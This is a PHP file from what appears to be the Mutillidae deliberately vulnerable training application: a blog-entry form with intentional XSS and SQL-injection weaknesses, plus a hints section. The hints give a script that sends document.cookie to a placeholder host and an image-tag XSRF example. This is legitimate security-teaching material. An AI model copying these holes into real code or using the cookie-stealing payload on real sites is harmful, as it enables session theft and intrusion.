-
Notifications
You must be signed in to change notification settings - Fork 3
/
add-to-your-blog.php
executable file
·95 lines (82 loc) · 3.78 KB
/
add-to-your-blog.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
<center><h2><b>Add to your blog</b></h2></center><p>
<form method="POST" action="" .$_SERVER['SCRIPT_NAME'] . "?" . $_SERVER['QUERY_STRING']>
<p>Welcome to your blog, leave an entry. Login, or you will be listed as "anonymous":</p>
<!--<p><input type="text" name="user_name" size="20"></p> -->
<p><textarea rows="10" cols="50" name="input" size="20"></textarea></p>
<input type="hidden" name="xsrf_token" value="<?php echo generateToken('protectedForm'); ?>"/>
<p><input type="submit" value="Submit" name="Submit_button"></p>
</form>
<?php
function generateToken( $formName )
{
if ( !session_id() ) {
session_start();
}
$sessionId = session_id();
return sha1( $formName.$sessionId );
}
function checkToken( $token, $formName )
{
return $token === generateToken( $formName );
}
if ( !empty( $_POST['xsrf_token'] ) ) {
if( checkToken( $_POST['xsrf_token'], 'protectedForm' ) ) {
// Grab inputs
$inputfromform = mysql_real_escape_string($_REQUEST["input"]);
$showonlyuser = $_REQUEST["show_only_user"];
if ($inputfromform <> "") {
$query = "INSERT INTO blogs_table(blogger_name, comment, date) VALUES ('".
$logged_in_user . "', '".
$inputfromform . "', " .
" now() )";
$result = mysql_query($query);
}
$query = "SELECT * FROM blogs_table WHERE
blogger_name like '{$logged_in_user}%'
ORDER BY date DESC
LIMIT 0 , 100";
$result = mysql_query($query) or die(mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);;
//echo $result;
echo 'Entries:<p>';
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "<p><b>{$row['blogger_name']}:</b>({$row['date']})<br>{$row['comment']}</p>";
}
echo "<p>";
echo "anti-XSRF token OK" , "<br> <br>";
}
else {
echo "<BR> <BR>", "ANTI - XSRF TOKEN TAMPERED WITH!", "<BR> <BR>";
}
}
// Begin hints section
if ($_COOKIE["showhints"]==1) {
echo '<p><span style="background-color: #FFFF00">
<b>For XSS:</b>XSS is easy stuff. This one shows off both reflected (you see the results
instantly) and stored (someone can run across it later in another app that
uses the same database). "<script>alert("XSS");</script>" is the classic, but
there are far more interesting things you could do which I plan show in a video later.
For some hot cookie stealing action, try something like:</p>
<pre>
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
</pre>
<p><span style="background-color: #FFFF00">
Also, check out <a href="http://ha.ckers.org/xss.html">Rsnake\'s XSS Cheat Sheet</a>
for more ways you can encode XSS attacks that may allow you to get around some filters.
<br><br>
<b>For XSRF:</b>Ok, what you have do is create another page someplace and
make a link to an image that is not an image. You could use something like
the following:
<br>
<img src="http://dojo-basic/index.php?page=add-to-your-blog.php&input=hi%20there%20monkeyboy">
<br>
This is the easy way to do XSRF with the GET method. Just login as someone, make
your page with the link image someplace else, and then view it. You should now see
something new on the comment wall. :)
<br>
<b>WATCH OUT for the new anti-XSRF token!!!!</b>
</span></p>';
}
?>